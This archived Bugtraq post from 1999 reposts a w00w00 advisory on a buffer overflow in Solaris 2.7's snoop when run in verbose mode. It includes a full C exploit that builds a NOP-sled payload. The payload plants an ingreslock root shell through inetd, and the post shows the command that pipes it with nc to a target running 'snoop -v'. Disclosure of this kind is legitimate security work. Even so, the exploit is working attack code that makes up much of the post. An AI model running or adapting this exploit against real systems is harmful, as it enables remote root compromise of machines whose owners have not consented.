Home page logo

bugtraq logo Bugtraq mailing list archives

w00giving #8] Solaris 2.7's snoop
From: aleph1 () UNDERGROUND ORG (Aleph One)
Date: Mon, 6 Dec 1999 22:46:12 -0800

Date: Tue, 7 Dec 1999 04:42:06 +0300 (MSK)
From: Matt Conover <shok () cannabis dataforce net>
To: news () technotronic com
cc: w00w00 () blackops org
Subject: [w00giving #8] Solaris 2.7's snoop
Message-ID: <Pine.LNX.3.95.991207044002.14801C-100000 () cannabis dataforce net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-news () technotronic com
Precedence: bulk

[Note: as we promised, our website and technotronic will get this advisory
before anything else does.  Thanks for participating in technotronic.]

w00w00 Security Development (WSD)

Discovered by: K2 (ktwo () ktwo ca)

Snoop is a program similar to tcpdump that allows one to watch
network traffic.  There is a buffer overflow in the snoop program when run
in verbose (-v) mode that occurs when a domain name greater than 1024
bytes is logged, because it will overwrite a buffer in print_domain_name.
This vulnerability allows remote access to the system with the privileges
of the user who ran snoop (usually root, because it requires read
privileges on special devices).

Exploit (by cheez):

   Remote Solaris 2.7 x86 snoop exploit

   Run with ( ./snp ) | nc -u target_host_network 53
   requires target host to be running "snoop -v"

   Thanks str/horizon for shellcodes (hi plaguez)

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
"\x68\x28\x2D\x63\x29 echo w00w00;"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"
"/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";

#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

char buffer[SIZE];
const char x86_nop=0x90;
long nop=NOPDEF, esp=0x8047344, offset=DEFOFF;

int main (int argc, char *argv[])
    int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    fprintf(stderr,"0x%x\n", esp+offset);
    printf("%s", buffer);

    return 0;


Because Sun Microsystems doesn't include source, we must wait for them to
release a patch.

http://www.roses-labs.com, http://www.napster.com,
http://www.technotronic.com, http://www.w00w00.org

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]